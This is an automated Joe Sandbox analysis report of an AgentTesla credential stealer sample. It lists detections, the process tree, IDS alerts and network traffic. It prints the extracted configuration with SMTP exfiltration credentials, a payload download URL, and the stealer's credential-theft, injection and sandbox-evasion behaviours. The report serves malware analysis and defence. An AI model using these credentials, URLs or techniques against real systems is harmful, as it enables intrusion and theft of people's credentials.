Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ref#0503711.exe

Overview

General Information

Sample name:Ref#0503711.exe
Analysis ID:1528272
MD5:3b2e54913c8b29ce886c8b36f8dd0cfc
SHA1:ff514c4f55dc70f5d1914fcf7118f24fd636e8a2
SHA256:405832c40918da8ad82482319361d443a19cb05d8834e0258e5c54bf11faae84
Tags:bookingexeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Ref#0503711.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\Ref#0503711.exe" MD5: 3B2E54913C8B29CE886C8B36F8DD0CFC)
    • docdd.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Local\Temp\docdd.exe" MD5: DBD0E17845DA07384D942B76268CF5B7)
      • tmp2083.tmp.exe (PID: 7652 cmdline: "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe" MD5: 1590A3EFB4A143305E7182FBD284A414)
        • tmp2083.tmp.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe" MD5: 1590A3EFB4A143305E7182FBD284A414)
          • WerFault.exe (PID: 7812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 996 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • Ref#0503711.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\Ref#0503711.exe" MD5: 3B2E54913C8B29CE886C8B36F8DD0CFC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2919838157.0000000002F47000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 21 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.Ref#0503711.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                2.2.Ref#0503711.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  2.2.Ref#0503711.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.Ref#0503711.exe.5fa0000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    3.2.tmp2083.tmp.exe.5ba0000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 13 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\ioibrzb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Ref#0503711.exe, ProcessId: 7332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ioibrzb
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Ref#0503711.exe, Initiated: true, ProcessId: 7416, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-07T18:07:33.489717+020020301711A Network Trojan was detected192.168.2.449733162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-07T18:05:56.019610+020028555421A Network Trojan was detected192.168.2.449733162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-07T18:05:56.019610+020028552451A Network Trojan was detected192.168.2.449733162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-07T18:07:33.489717+020028400321A Network Trojan was detected192.168.2.449733162.254.34.31587TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 2.2.Ref#0503711.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                      Multi AV Scanner detection for submitted file
                      Source: Ref#0503711.exeReversingLabs: Detection: 31%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ioibrzb.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Ref#0503711.exeJoe Sandbox ML: detected
                      Source: Ref#0503711.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.21.56.249:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: Ref#0503711.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: mscorlib.pdb# source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Qytqeye.pdb source: tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004632000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004231000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2941035784.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: %%.pdb source: tmp2083.tmp.exe, 00000004.00000002.2914577313.0000000001339000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbTe source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\tmp2083.tmp.PDB source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000171A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#0503711.exe, 00000000.00000002.1724582312.0000000006190000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb4ssMm2 source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdbj source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#0503711.exe, 00000000.00000002.1724582312.0000000006190000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbsP source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Qytqeye.pdbH source: tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004632000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004231000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2941035784.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.0000000001638000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: m0C:\Windows\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2914577313.0000000001339000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb]p source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000171A000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 4x nop then jmp 060A70FBh0_2_060A706B
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 4x nop then jmp 060A70FBh0_2_060A7078
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 4x nop then jmp 060AF140h0_2_060AF088
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 4x nop then jmp 060AF140h0_2_060AF080
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_060CD640
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 4x nop then jmp 060E5416h0_2_060E56DE
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_060E3B38
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_060E3B40
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 4x nop then jmp 060E5416h0_2_060E5388
                      Source: C:\Users\user\Desktop\Ref#0503711.exeCode function: 4x nop then jmp 060E5416h0_2_060E5398
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then jmp 05B05E8Fh3_2_05B05E30
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then jmp 05B05E8Fh3_2_05B05E22
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then jmp 05B0EA60h3_2_05B0E9A0
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then jmp 05B0EA60h3_2_05B0E9A8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then jmp 05B06B3Dh3_2_05B06958
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then jmp 05B06B3Dh3_2_05B0694A
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then jmp 05B05E8Fh3_2_05B06212
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05B335B0
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05B335A9
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then jmp 05B35159h3_2_05B34F31
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then jmp 05B35159h3_2_05B34E3F
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then jmp 05B35159h3_2_05B34E40
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_05B9DAC0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49733 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49733 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49733 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49733 -> 162.254.34.31:587
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.4:49733 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET /d/4wmb3QgRfXU5M4s2/bHzsEUNaVOT3WXU2lPvPRcIphVFu9mJr HTTP/1.1Host: tempfiles.ninjaConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.4:49733 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /d/4wmb3QgRfXU5M4s2/bHzsEUNaVOT3WXU2lPvPRcIphVFu9mJr HTTP/1.1Host: tempfiles.ninjaConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: tempfiles.ninja
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: tmp2083.tmp.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002701000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002773000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: docdd.exe, 00000001.00000002.1728738734.000000000278C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempfiles.ninja
                      Source: docdd.exe, 00000001.00000002.1728738734.000000000278C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempfiles.ninjad
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: docdd.exe, 00000001.00000002.1728738734.0000000002701000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002773000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tempfiles.ninja
